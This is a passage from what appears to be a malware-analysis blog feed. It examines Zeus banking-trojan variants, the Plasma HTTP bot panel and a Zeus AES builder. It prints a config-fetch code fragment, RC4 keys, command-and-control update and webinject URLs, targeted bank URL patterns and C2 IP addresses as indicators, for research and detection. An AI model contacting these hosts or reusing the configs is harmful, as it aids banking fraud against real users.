<span style="color: crimson;">urllib2</span>.<span style="color: black;">urlopen</span><span style="color: black;">(</span>request<span style="color: black;">)</span>.<span style="color: black;">read</span><span style="color: black;">(</span><span style="color: black;">)</span><br /> <span style="color: green;">open</span><span style="color: black;">(</span><span style="color: darkslateblue;">'ajax'</span>, <span style="color: darkslateblue;">'w'</span><span style="color: black;">)</span>.<span style="color: black;">write</span><span style="color: black;">(</span>page<span style="color: black;">)</span></div> <br /> Notice the new headers:<br /> X_ID = Bot ID<br /> X_OS = OS version<br /> X_BV = Variant version<br /> <br /> The answer of the server have X_ID as cookie:<br /> <div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> &lt;&lt; HTTP/1.1 200 OK<br /> &lt;&lt; Date: Fri, 28 Feb 2014 06:35:34 GMT<br /> &lt;&lt; Server: Apache<br /> &lt;&lt; Set-Cookie: X_ID=14E255CE7875768FBC303C10; expires=Sat, 28-Feb-2015 06:35:34 GMT; path=/<br /> &lt;&lt; Content-Description: File Transfer<br /> &lt;&lt; Content-Disposition: attachment; filename=ajax<br /> &lt;&lt; Content-Transfer-Encoding: binary<br /> &lt;&lt; Expires: 0<br /> &lt;&lt; Cache-Control: must-revalidate, post-check=0, pre-check=0<br /> &lt;&lt; Pragma: public<br /> &lt;&lt; Content-Length: 3685<br /> &lt;&lt; Connection: close<br /> &lt;&lt; Content-Type: application/octet-stream</div> <br /> Sample: bb9fe8c3df598b8b6ea2f2653c38ecd2<br /> <div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> Version: 1.1.3.4 <br /> RC4: E2 82 3E B3 04 11 15 34 17 64 01 DC 7D B8 A5 35 CB 00 19 AA 81 59 6E 1B 85 7E 44 CA 10 90 40 2A C3 36 20 C5 C2 55 E6 F4 43 67 5B 42 4D 21 98 D4 78 70 1A 6F 72 24 88 B4 0A E7 B9 BC C1 8E 8F 79 86 CC 5F 46 FC A9 1C F0 74 E0 C0 3F 8D DD EC 4C 66 A0 02 97 C6 99 BB 7F 0D A8 3A 27 07 E8 75 80 28 54 93 D3 BD 2C EA 9D F6 0B 45 2E F1 EB A3 0E 9E BA 4B 9F 09 89 56 29 C4 48 23 14 2F DA F5 39 3B 8C CD 2B 37 41 A2 95 0F C9 BE AD F8 D7 DE C8 B5 0C 76 51 DF 5D B2 D6 AC 83 52 08 50 92 E1 B0 9C AE CF E4 ED B1 5E 7C 6A 96 65 26 87 2D 12 8A 9A A4 FF 94 D2 7A C7 47 31 7B EE CE DB 32 B7 06 D1 F2 EF AB AF 3C 18 84 E3 22 61 03 3D D9 9B 05 58 D8 30 F7 F3 B6 62 8B 1E 6C 71 FA 4A 4E 63 60 4F 16 6D 25 FB 53 FD 13 33 D0 E9 73 68 F9 69 A6 38 57 6B 5A 49 1D A1 A7 1F BF 5C D5 E5 91 77 FE<br /> Drop Point: http://localhost/gate.php<br /> Infection Point: http://localhost/bot.exe<br /> Update Point:<br /> http://secureinformat.com/?ajax (static config)</div> <br /> For unpacking the config, here again nothing new, regular Zeus v2.<br /> Once unpacked, we can see that the malware is targeting German banks and Trusteer:<br /> <div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> http*://*netbanking.sparkasse.at/hilfe/sicherheit*<br /> https://*banking.berliner-bank.de/trxm*<br /> https://*banking.co.at*<br /> https://*commerzbank.de*<br /> https://*commerzbanking.de*<br /> https://*meine.deutsche-bank.de/trxm/db*<br /> https://*meine.norisbank.de/trxm/noris*<br /> https://banking.postbank.de/rai*<br /> https://banking.sparda.de*<br /> https://finanzportal.fiducia.de*<br /> https://netbanking.sparkasse.at/*<br /> https://netbanking.sparkasse.at/casserver/login*<br /> https://netbanking.sparkasse.at/sPortal/*<br /> https://online-*.unicredit.it/*<br /> https://online.bankaustria.at*<br /> https://*commerzbank.de*<br /> https://*commerzbanking.de*<br /> https://*meine.deutsche-bank.de/trxm/db*<br /> https://*meine.norisbank.de/trxm/noris*<br /> https://www.trusteer.com/ProtectYourMoney*</div> WebInjects:<br /> <div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> https://secure730.com/oz1/service.in?id=50<br /> https://secure730.com/oz1/service.in?id=44<br /> https://secure730.com/oz1/service.in?id=43<br /> https://secure730.com/oz1/service.in?id=41<br /> https://secure730.com/oz1/service.in?id=7<br /> https://secure730.com/oz1/service.in?id=6<br /> https://secure730.com/oz1/service.in?id=4<br /> https://secure730.com/oz1/service.in?id=3<br /> https://secure730.com/oz1/service.in?id=2<br /> https://secure730.com/oz1/service.in?id=1<br /> https://secureinformat.com/id/351<br /> https://secureinformat.com/id/350<br /> https://secureinformat.com/id/51<br /> https://secureinformat.com/id/10</div> <br /> Man in the browser:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOttnq8hc6iCfXEWskvYghbCmm5aiPMdI50oFDjOOZbigoOR78mpmOq3zFGGBH6Mbn_dUJ47mAQoI0XwHhxv6WBBsgxRxOuFtCwA4dwAqKU2oaBbsxy0eInLW3JPxmOLSV6c3S3G0FNWI/s1600/04-03-2014+18-12-39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOttnq8hc6iCfXEWskvYghbCmm5aiPMdI50oFDjOOZbigoOR78mpmOq3zFGGBH6Mbn_dUJ47mAQoI0XwHhxv6WBBsgxRxOuFtCwA4dwAqKU2oaBbsxy0eInLW3JPxmOLSV6c3S3G0FNWI/s1600/04-03-2014+18-12-39.png" height="300" width="400" /></a></div> <br /> Clean browser surfing Trusteer website:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjT_ovq8FMNTGnuhQ8vgIvG00_-e06Ed-hlsfdVunf0ywk7kEiElkqKMicPB8I6mn9_DlxwPSO9iWaM-iardKmfcpNTuNMMJ_FVW7SyatSjjnUfHDAytR8p7iqUzPKby9PpQvZq0QjfipI/s1600/02-03-2014+19-21-08.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjT_ovq8FMNTGnuhQ8vgIvG00_-e06Ed-hlsfdVunf0ywk7kEiElkqKMicPB8I6mn9_DlxwPSO9iWaM-iardKmfcpNTuNMMJ_FVW7SyatSjjnUfHDAytR8p7iqUzPKby9PpQvZq0QjfipI/s1600/02-03-2014+19-21-08.png" height="300" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> </div> <br /> Infected browser surfing Trusteer website:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_Qmmrm_JiwhZgX5iuKo_pt2fHC4ilXR2TVgWx7xB-a-nIfhuGvl0EZrUvqUOFRwJaqlJBwWSKmlDTrJC23Ku-lobvM-RTDZevw0op0JJWHkfC2ja5y6NIe6Cb2zLss5XL7nwmI_UfHBY/s1600/02-03-2014+18-58-56.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_Qmmrm_JiwhZgX5iuKo_pt2fHC4ilXR2TVgWx7xB-a-nIfhuGvl0EZrUvqUOFRwJaqlJBwWSKmlDTrJC23Ku-lobvM-RTDZevw0op0JJWHkfC2ja5y6NIe6Cb2zLss5XL7nwmI_UfHBY/s1600/02-03-2014+18-58-56.png" height="300" width="400" /></a></div> Requesting the user to download an APK:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4HnQ4uzsgxJ7IzmEqrRdGC2dtLKelje-BzdMTV-z2W5UwYo9hRgr1RhiYaRDv-VxE0u2E8wWQ6Z55rW0wJwJXSK5eNEeLfpxYkPpKhRDJffzTLOPvTa90TXiRP4r-733GYdSnGgOYKVM/s1600/02-03-2014+18-59-13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4HnQ4uzsgxJ7IzmEqrRdGC2dtLKelje-BzdMTV-z2W5UwYo9hRgr1RhiYaRDv-VxE0u2E8wWQ6Z55rW0wJwJXSK5eNEeLfpxYkPpKhRDJffzTLOPvTa90TXiRP4r-733GYdSnGgOYKVM/s1600/02-03-2014+18-59-13.png" height="300" width="400" /></a></div> Test done on the latest Firefox version (v27.0.1)<br /> <br /> bit.ly/1jmQHmA = hxtp://shlyxiest.biz/cdn/Trusteer-Mobile.apk<br /> &gt;&gt; <a href="https://www.virustotal.com/en/file/2f82ce7288137c0acbeefd9ef9f63926057871611703e77803b842201009767a/analysis/1393786189/">https://www.virustotal.com/en/file/2f82ce7288137c0acbeefd9ef9f63926057871611703e77803b842201009767a/analysis/1393786189/</a><br /> Phone number:&nbsp; 79670478968<br /> <br /> Identified as Perkel.c by Kaspersky, Perkel is an android malware who was sold by Perkele (this guy was later banned from underground forums for scaming but it's another story)<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjckgwGAODBGy3yfvcPqxX4ZNW2f04m6hyhKW9Kia41ZaMuwarBNayN0C1fq4__Mh6VGU6Hz25Bs6094iv0EqZiLI3HFgEVOd3Ggf0aSrqWJ0VnIkIe2WavxnmPrI348fKTvfN8rDkj-rY/s1600/03-03-2014+13-09-31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjckgwGAODBGy3yfvcPqxX4ZNW2f04m6hyhKW9Kia41ZaMuwarBNayN0C1fq4__Mh6VGU6Hz25Bs6094iv0EqZiLI3HFgEVOd3Ggf0aSrqWJ0VnIkIe2WavxnmPrI348fKTvfN8rDkj-rY/s1600/03-03-2014+13-09-31.png" height="400" width="345" /></a></div> <br /> Sort of Fake AV:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTwfAUPIjdQW_fGzj2eiId5_vJRGLzdoaIUGcdnK09BSV6fsOgMorc9ef4m9C7kFTKnVnxO5CfOA1af0RJzAmdpG8csoth-rvEOX7uqIaC4_hg1PV4DsbCnVqquH7KeQpDQDDk_zy3H4M/s1600/Screenshot+from+2014-03-04+19_11_23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTwfAUPIjdQW_fGzj2eiId5_vJRGLzdoaIUGcdnK09BSV6fsOgMorc9ef4m9C7kFTKnVnxO5CfOA1af0RJzAmdpG8csoth-rvEOX7uqIaC4_hg1PV4DsbCnVqquH7KeQpDQDDk_zy3H4M/s1600/Screenshot+from+2014-03-04+19_11_23.png" height="400" width="240" /></a></div> <br /> Sample: 917df7b6268ba705b192b89a1cf28764<br /> <div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> Version: 1.1.3.4<br /> RC4: E2 82 3E B3 04 11 15 34 17 64 01 DC 7D B8 A5 35 CB 00 19 AA 81 59 6E 1B 85 7E 44 CA 10 90 40 2A C3 36 20 C5 C2 55 E6 F4 43 67 5B 42 4D 21 98 D4 78 70 1A 6F 72 24 88 B4 0A E7 B9 BC C1 8E 8F 79 86 CC 5F 46 FC A9 1C F0 74 E0 C0 3F 8D DD EC 4C 66 A0 02 97 C6 99 BB 7F 0D A8 3A 27 07 E8 75 80 28 54 93 D3 BD 2C EA 9D F6 0B 45 2E F1 EB A3 0E 9E BA 4B 9F 09 89 56 29 C4 48 23 14 2F DA F5 39 3B 8C CD 2B 37 41 A2 95 0F C9 BE AD F8 D7 DE C8 B5 0C 76 51 DF 5D B2 D6 AC 83 52 08 50 92 E1 B0 9C AE CF E4 ED B1 5E 7C 6A 96 65 26 87 2D 12 8A 9A A4 FF 94 D2 7A C7 47 31 7B EE CE DB 32 B7 06 D1 F2 EF AB AF 3C 18 84 E3 22 61 03 3D D9 9B 05 58 D8 30 F7 F3 B6 62 8B 1E 6C 71 FA 4A 4E 63 60 4F 16 6D 25 FB 53 FD 13 33 D0 E9 73 68 F9 69 A6 38 57 6B 5A 49 1D A1 A7 1F BF 5C D5 E5 91 77 FE<br /> Drop Point: http://localhost/gate.php<br /> Infection Point: http://localhost/bot.exe<br /> Update Points:<br /> https://koloboktv.com/?ajax (static config)<br /> https://securestakan2.net/?ajax (dynamic config)<br /> https://securemagnit5.net/?ajax (dynamic config)</div> WebInjects:<br /> <div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> https://pikachujp.com/oz1/service.in?id=50<br /> https://pikachujp.com/oz1/service.in?id=44<br /> https://pikachujp.com/oz1/service.in?id=43<br /> https://pikachujp.com/oz1/service.in?id=41<br /> https://pikachujp.com/oz1/service.in?id=7<br /> https://pikachujp.com/oz1/service.in?id=6<br /> https://pikachujp.com/oz1/service.in?id=4<br /> https://pikachujp.com/oz1/service.in?id=3<br /> https://pikachujp.com/oz1/service.in?id=2<br /> https://pikachujp.com/oz1/service.in?id=1<br /> https://koloboktv.com/id/351<br /> https://koloboktv.com/id/350<br /> https://koloboktv.com/id/51<br /> https://koloboktv.com/id/10</div> <br /> Sample: 7fb62987f20b002475cb1499eb86a1f5<br /> <div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> Version: 1.1.2.1<br /> RC4: 30 72 E6 32 80 EF BD 92 BE DD 3B 1C 58 45 33 2F 41 53 A9 26 8E 20 4D 8A DB 6A F6 8B CE 4C B6 38 02 2B 6C 15 A1 2C 2D C2 ED 0E BB BF 64 40 F1 9F D2 36 07 C3 CF 8D AA D3 A5 42 C0 9B 48 49 67 81 98 75 51 1B 96 6E 97 4A 59 DE 44 65 85 7B 35 16 0C 23 4F FE 5B FA D7 84 A7 46 EE 82 DF E1 6B AD 94 CB 18 C4 8C 0F E7 00 E0 7E CA 24 1A 7A A6 73 3C 03 F5 9C EA 1E FB D4 0B 14 11 22 06 F4 6D 55 E5 93 F9 E2 69 D5 CD 27 E8 12 C8 77 0D 08 A2 B7 0A 01 D8 EB 3F AB 3A 61 83 04 86 CC FD F3 5F 63 09 AC AF 66 17 B9 56 19 F2 C7 47 43 25 1D 89 29 99 2E C1 87 54 C9 62 34 74 4B A0 B1 3E 21 57 52 2A 39 FF 05 BC C6 A4 4E 3D 9D E3 D9 BA 76 5C AE A3 FC B4 B3 D6 28 5A 68 F7 31 7D 7F E4 1F 37 D1 90 B5 B0 D0 C5 79 DA 13 71 A8 7C EC F8 E9 60 50 88 78 70 10 B2 5E 8F 6F 9A B8 95 DC 9E 91 F0 5D<br /> Update Point:<br /> https://securestatic.com/?ajax (static config)</div> <br /> All these samples use the same IP range:<br /> • dns: 1 ›› ip: 37.228.92.170 - adress: SECURE730.COM<br /> • dns: 1 ›› ip: 37.228.92.169 - adress: SECUREINFORMAT.COM<br /> • dns: 1 ›› ip: 37.228.92.148 - adress: SHLYXIEST.BIZ<br /> • dns: 1 ›› ip: 37.228.92.147 - adress: SECURESTATIC.COM<br /> • dns: 1 ›› ip: 37.228.92.146 - adress: KOLOBOKTV.COM<br /> <br /> I've wrote a small <a href="http://pastebin.com/VHBd72jr">yara rule</a> in hope to see more of these.<br /> All configs that i grabbed was reporting to localhost not to a server...<br /> <br /> <br /> <br /> <br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmR1uqsI6vB9pbcgVssUsGkMhn8wrtoDmmAgwPoy1et5_cIxwzRMRtXO8zQTPnRfi-Y6WSC4ho7BCTT-vKaI-Gizdid4hzMSg1xSmI_Ldh05kIjfgD4TO2vEkhy8NpSrp7RO3d32QpwhU/s1600/OPM.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmR1uqsI6vB9pbcgVssUsGkMhn8wrtoDmmAgwPoy1et5_cIxwzRMRtXO8zQTPnRfi-Y6WSC4ho7BCTT-vKaI-Gizdid4hzMSg1xSmI_Ldh05kIjfgD4TO2vEkhy8NpSrp7RO3d32QpwhU/s1600/OPM.jpg" height="400" width="277" /></a></div> <div class="separator" style="clear: both; text-align: center;"> </div> https://www.xylibox.com/2014/03/zeus-1134.htmlnoreply@blogger.com (Steven K)3tag:blogger.com,1999:blog-5365964245877416061.post-6662619202876533242Fri, 14 Feb 2014 22:19:00 +00002014-02-14T23:19:03.180+01:00plasma HTTPAdvert:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCG8zTNWaqcyPOKLZXvZlUrZ9IVwisZsOpOZork98A9ZyY1HFz-Meyj7-fXsm1LKEwm2CmN5uebll1iIkt7hVKTQX2cKeso_zmPC8ZrHqg7wRCpUI11GuVxZ2PZ9ktXqqGc0mCt1Hwdys/s1600/02-01-2014+21-51-26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCG8zTNWaqcyPOKLZXvZlUrZ9IVwisZsOpOZork98A9ZyY1HFz-Meyj7-fXsm1LKEwm2CmN5uebll1iIkt7hVKTQX2cKeso_zmPC8ZrHqg7wRCpUI11GuVxZ2PZ9ktXqqGc0mCt1Hwdys/s1600/02-01-2014+21-51-26.png" /></a></div> <br /> Login:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIrbTnmMUG12nukGinh_6bJzV-kmb_TZpxUUBUVAGnJe72l1_AEng3vKF4XN-ZL2JqiYj2kqFNJK3b_9mC2jr-KrenM_0PFXHQUVVEner-PJXS8avBOwINuPToLdlcfYSL5WmNsUTMmus/s1600/01-01-2014+02-26-45.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIrbTnmMUG12nukGinh_6bJzV-kmb_TZpxUUBUVAGnJe72l1_AEng3vKF4XN-ZL2JqiYj2kqFNJK3b_9mC2jr-KrenM_0PFXHQUVVEner-PJXS8avBOwINuPToLdlcfYSL5WmNsUTMmus/s400/01-01-2014+02-26-45.png" height="275" width="400" /></a></div> <br /> Online bot:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnuad_lDnllRrpE-AlsREghWI_hjEBl4ggNRwnKqdtUnjI3XCKWHR6UAhdYWi_PVQ3FJ8tvxkq9fxmO1Lc_cX3y3gqo7nS5Tazc7YFWbLtuaiZegXsZ9i52PPuXFpt2mDQbWHn9guPM2k/s1600/01-01-2014+02-29-28.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnuad_lDnllRrpE-AlsREghWI_hjEBl4ggNRwnKqdtUnjI3XCKWHR6UAhdYWi_PVQ3FJ8tvxkq9fxmO1Lc_cX3y3gqo7nS5Tazc7YFWbLtuaiZegXsZ9i52PPuXFpt2mDQbWHn9guPM2k/s400/01-01-2014+02-29-28.png" height="390" width="400" /></a></div> <br /> offline bots:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjP6L6cfeBowqxx9-6sHZrzDhHQasS6Zje07bga9mkikoGOWpFonNe3ojZqBSpcBnBuEESVjfhLt6Ey54TxhVSA3sr85E4ZpJJfAMC_U5BnriZ7CbswgahoNK6e-OSZypN1mCbCjEXMvw/s1600/01-01-2014+02-34-26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjP6L6cfeBowqxx9-6sHZrzDhHQasS6Zje07bga9mkikoGOWpFonNe3ojZqBSpcBnBuEESVjfhLt6Ey54TxhVSA3sr85E4ZpJJfAMC_U5BnriZ7CbswgahoNK6e-OSZypN1mCbCjEXMvw/s400/01-01-2014+02-34-26.png" height="390" width="400" /></a></div> <br /> Commands:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7q3TbJFbTt4wgPUUJtAlI-XGonwWBGML6jYXFPyRAX6uV3de6w2vd1rJC3Ox1XaeopVqLAZKfpzqjUSHtPrj9GwB6ls9cSAVi2TlNQDcyVlWUvtHwsT1fLoDBRYO8y2ql2gu0LqNaCOw/s1600/01-01-2014+02-41-50.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7q3TbJFbTt4wgPUUJtAlI-XGonwWBGML6jYXFPyRAX6uV3de6w2vd1rJC3Ox1XaeopVqLAZKfpzqjUSHtPrj9GwB6ls9cSAVi2TlNQDcyVlWUvtHwsT1fLoDBRYO8y2ql2gu0LqNaCOw/s400/01-01-2014+02-41-50.png" height="262" width="400" /></a></div> <br /> Statistics:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXO-vUP993vqFiqGEWK9jzSv-g0ylvp5xE1w1Z2i0SWgg3Zn_j_IglvYJ-3MJNdpcKHdd5RWcMNXT_IK0YEMclvbOW4HkfmCiIc_5vCSGmZF-wM1fdxUjxoXZ-9_vM96YsskcRK-SFr5E/s1600/01-01-2014+02-43-06.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXO-vUP993vqFiqGEWK9jzSv-g0ylvp5xE1w1Z2i0SWgg3Zn_j_IglvYJ-3MJNdpcKHdd5RWcMNXT_IK0YEMclvbOW4HkfmCiIc_5vCSGmZF-wM1fdxUjxoXZ-9_vM96YsskcRK-SFr5E/s400/01-01-2014+02-43-06.png" height="231" width="400" /></a></div> <br /> Logs:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPfxVLSp81kodVUIGLBKoEpkEJvlBRtH1upAtyr7SpqU_IkKdm3jntvXKKFJ8VJC6ccL5vBbBe_l-046A1cqhVITA4yMCFnVan1fpVBd8Y6TXuI32WK5LL1YdA_ATdopnncr5c6GHJUD4/s1600/01-01-2014+02-45-21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPfxVLSp81kodVUIGLBKoEpkEJvlBRtH1upAtyr7SpqU_IkKdm3jntvXKKFJ8VJC6ccL5vBbBe_l-046A1cqhVITA4yMCFnVan1fpVBd8Y6TXuI32WK5LL1YdA_ATdopnncr5c6GHJUD4/s400/01-01-2014+02-45-21.png" height="216" width="400" /></a></div> <br /> <br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVoHKAglsoQSWTpLvE2KNIJi8TPr_Qp5WdlkWcZBpZ61ab1_7pSjFjbPJd0oZJ-ugbrSdNpdH8qiCnZnDdN-549YRmtnHgbbcYDqa5rHpmhZJFk2k3ecwKaBPGkHSr1MFDF7c3lDeQNlM/s1600/14-02-2014+21-23-26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVoHKAglsoQSWTpLvE2KNIJi8TPr_Qp5WdlkWcZBpZ61ab1_7pSjFjbPJd0oZJ-ugbrSdNpdH8qiCnZnDdN-549YRmtnHgbbcYDqa5rHpmhZJFk2k3ecwKaBPGkHSr1MFDF7c3lDeQNlM/s1600/14-02-2014+21-23-26.png" height="67" width="400" /></a></div> Yeah take this lame article to second degree, i just talk about Plasma because i've promised to write something today on irc.<br /> <br /> I'm not dead but there nothing interesting to review for the moment, only crappy bots<br /> That also one of the reason i haven't talked of <a href="http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;t=1756&amp;start=160#p22150">JackPos</a> and all the rest.<br /> I have some interesting things but it's too sensitive for the moment and when it's not the reason, it's due to people who request me to don't talk of a subject because they want to cover it 'first' for their company but who finaly write nothing, so i still wait (you know who you are)<br /> e.g: <a href="http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;t=474&amp;start=230#p22139">ZeusVM</a>, i wanted to talk about the weird version who appeared since some months now<br /> a version who download from sites (on ssl and fastflux) a picture with a config embedded inside.. but well, fuck it now.<br /> As i already told on a previous article, i may appear inactive but i'm not so inactive.<br /> I've recently do <a href="http://cybercrime-tracker.net/zbox.php">this</a>, i still continue to posts malwares, break things but without necessarily talking about it or just briefly like for jackTrash, and today: PlasmaTrash, and <a href="http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;t=3166">iTrashing</a>.<br /> I still continue to do <a href="http://www.youtube.com/watch?v=xdC0sONiCI4">trashy</a> video, show trashy things on my <a href="http://www.hackgyver.org/">hackerspace</a> and talk about trashs on <a href="https://twitter.com/MalwareTechBlog/status/433277311467520000">irc</a>. (yeah that a lot of trash)<br /> So for the moment, i just wait and see... https://www.xylibox.com/2014/02/plasma-http.htmlnoreply@blogger.com (Steven K)3tag:blogger.com,1999:blog-5365964245877416061.post-1715151677665487452Sat, 11 Jan 2014 17:18:00 +00002014-01-11T18:23:32.673+01:00phpZbotZeuSZeus 2.9.6.1ZeusAESI got a look on the zeus builder who was released by the MMBB guy on exploit.in, finally i'm decided to write something about it, so let's talk about the change in the config encryption.<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-XfLKAVlZNV2wypPwWNQ2mNl57CEKvEfxb67CdkXKcKm-ngjohPADb2zSHU5EjnJ0k8ur6HokiF99t8ATvmiL1E0lcOQ6CdsnfcaM1jdg6cYLlyKVhHN1dknRHOXzDMWhhU7Y7OmQemM/s1600/11-01-2014+14-53-52.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-XfLKAVlZNV2wypPwWNQ2mNl57CEKvEfxb67CdkXKcKm-ngjohPADb2zSHU5EjnJ0k8ur6HokiF99t8ATvmiL1E0lcOQ6CdsnfcaM1jdg6cYLlyKVhHN1dknRHOXzDMWhhU7Y7OmQemM/s1600/11-01-2014+14-53-52.png" height="263" width="400" /></a></div> MD5: <a href="https://www.virustotal.com/en/file/382e34d713572348c76eb81313ead3066da307b5b7a3cede83484b7fb235b1dc/analysis/1388760471/">0a05783316e7f765e731aadf5098564f</a><br /> <br /> This version use AES instead of RC4 and can interact with the latest version of Firefox.<br /> Anyway it's nothing more than a basic Zeus v2.<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhk8a2t8dQmhyHvjo4d9f-VvhRVfkbJCJQQsIN9cq9AfDjVdJ4oT6I2yF41TQMC1Ix2kdGDRCFmnuD7lnNWxOHe4RY2AZcvXXHG8waclvVYfcwlV60OzKWKgJkX6Hy4jF2qEH4eUJwQNx0/s1600/11-01-2014+15-02-10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhk8a2t8dQmhyHvjo4d9f-VvhRVfkbJCJQQsIN9cq9AfDjVdJ4oT6I2yF41TQMC1Ix2kdGDRCFmnuD7lnNWxOHe4RY2AZcvXXHG8waclvVYfcwlV60OzKWKgJkX6Hy4jF2qEH4eUJwQNx0/s1600/11-01-2014+15-02-10.png" height="300" width="400" /></a></div> <br /> iBank parser on the panel, monitoring of process:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3qxT14Kjzd9oiAPFxcur2t5e8O_pxrn7v51Q6CRkwpiBEu8OdzJSAXNGq3TgFkfbuaZXCLrTUXXCcPtudliT6ZR46V_wwTsYE9S7W64abXKOG9WPd51ADDSYcv_oMplqESDPn9Ei-eAM/s1600/11-01-2014+15-13-33.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3qxT14Kjzd9oiAPFxcur2t5e8O_pxrn7v51Q6CRkwpiBEu8OdzJSAXNGq3TgFkfbuaZXCLrTUXXCcPtudliT6ZR46V_wwTsYE9S7W64abXKOG9WPd51ADDSYcv_oMplqESDPn9Ei-eAM/s1600/11-01-2014+15-13-33.png" height="273" width="400" /></a></div> About the panel, the released version require Ioncube loader (nvm, the gate code can be recovered easily) <br /> <br /> Now let's view an example of report from modules, keylog+screenshot:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-8MCW6RCPLKtiX5wu2d_YGj9VDvid3Dawph5pBGv4jeVIF1sDmqqj0RVSsgY-r4WWtFg3VZ-MlAyKSF72J5pPNP4yhw7R6kH8wuYJufypRpAvhbEvs14oVQY02EcJ0q-4dokgTMLGdpc/s1600/11-01-2014+16-26-41.png" imageanchor="1" style="margin-left: 1em; margin-right: 